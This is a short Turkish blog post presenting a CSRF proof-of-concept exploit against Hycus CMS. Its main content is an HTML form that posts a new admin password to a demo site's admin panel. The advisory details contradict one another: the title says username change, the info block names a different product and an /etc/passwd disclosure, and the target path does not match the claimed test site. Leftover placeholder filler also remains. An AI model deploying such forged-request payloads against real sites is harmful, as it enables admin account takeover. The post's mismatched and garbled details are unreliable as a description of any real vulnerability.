6 Mayıs 2011 Cuma

Hycus CMS <= (allversion) Username Change CSRF PoC

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
--------------------------------------------------------
Þu metriisiiin önüüüüüüüü...
 bir uzunnnnnn alannn...
  
--------------------------------------------------------
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HOMEPIMA Design
|~Price : N/A
|~Version : N/A
|~Vulnerability Style : /etc/passwd Disclosure
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : "06.05.2011"
|[~]Tested on : Offical Demo ; http://demo.opensourcecms.com/hycus/
----------------------------------------------------------
update.html <=  SESSIONS Not Security
 
Username Change CSRF PoC Exploit
 
    ================================================================
     
                <form action='http://demo.opensourcecms.com/dorg/admin_panel/users.php?page=2&id=1' method="POST">
                        <table>
                                <tr>
                                        <td>Username: </td>
                                        <td><strong>admin</strong></td>
                                </tr>
                                <tr><td colspan='2'><!----></td></tr>
                                <tr>
                                        <td>Active?</td>
                                        <td><strong>yes</strong></td>
                                </tr>
                                <tr><td colspan='2'><br /></td></tr>
                                <tr>
                                        <td><label for="new_pw">New password:</label></td>
                                        <td><input type="password" name="new_pw" id="new_pw" /></td>
                                </tr>
                                <tr>
                                        <td><label for="new_pw_c">New password (confirmation):</label></td>
                                        <td><input type="password" name="new_pw_c" id="new_pw_c" /></td>
                                </tr>
                                <tr><td colspan='2'><i>Your password will be encrypted</i></td></tr>
                                <tr><td colspan='2'><br /></td></tr>
                                <tr><td colspan='2'><input type='submit' name='submit' value='Update' />&nbps;-&nbps;or&nbps;-&nbps;<input type='submit' name='submit' value='Deactivate User' /></td></tr>
                        </table>
                </form>
 
 OHH OKAY...
    ================================================================

Hiç yorum yok:

Yorum Gönder